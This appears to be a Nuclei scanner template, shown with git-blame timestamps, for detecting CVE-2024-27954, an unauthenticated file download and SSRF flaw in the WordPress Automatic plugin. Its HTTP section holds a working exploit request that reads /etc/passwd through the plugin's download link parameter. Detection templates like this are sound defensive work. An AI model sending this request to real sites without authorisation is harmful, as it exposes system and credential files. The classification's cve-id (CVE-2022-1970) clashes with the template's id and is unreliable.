2024-03-22 15:33:04 +00:00
id : CVE-2024-27954
info :
2024-03-22 15:43:51 +00:00
name : WordPress Automatic Plugin <3.92.1 - Arbitrary File Download and SSRF
2024-03-22 15:33:04 +00:00
author : iamnoooob,rootxharsh,pdresearch
severity : critical
description : |
2024-03-22 15:43:51 +00:00
WordPress Automatic plugin <3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1.
2024-03-22 15:33:04 +00:00
reference :
2024-03-22 15:52:57 +00:00
- https://wpscan.com/vulnerability/53b97401-1352-477b-a69a-680b01ef7266/
2024-03-22 15:33:04 +00:00
- https://securityonline.info/40000-sites-exposed-wordpress-plugin-update-critical-cve-2024-27956-cve-2024-27954/#google_vignette
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27954
2024-03-22 15:43:51 +00:00
classification :
2024-03-22 15:52:57 +00:00
cvss-score : 9.8
cve-id : CVE-2022-1970
2024-03-23 09:28:19 +00:00
cwe-id : CWE-918
2024-03-22 15:43:51 +00:00
metadata :
verified : true
2024-03-23 09:28:19 +00:00
max-request : 1
2024-03-22 15:52:57 +00:00
publicwww-query : "/wp-content/plugins/wp-automatic"
2024-03-23 09:28:19 +00:00
tags : wpscan,cve,cve2024,wp,wordpress,wp-plugin,lfi,ssrf,wp-automatic
2024-03-22 15:33:04 +00:00
http :
2024-03-22 15:52:57 +00:00
- method : GET
path :
- "{{BaseURL}}/?p=3232&wp_automatic=download&link=file:///etc/passwd"
2024-03-22 15:33:04 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
- '"link":"file:'
2024-03-22 15:52:57 +00:00
- type : regex
regex :
- "root:.*:0:0:"
2024-03-22 16:07:42 +00:00
# digest: 4a0a00473045022100fe0fefeeca090cd190ad427541a138e93717d0eac2f27c00a2eec4bf5a63e30902202c2a3213ac5e28f8244ed547d1dd868bc948638e4cddaacee81de6d2f9422da1:922c64590222798bb761d5b6d8e72950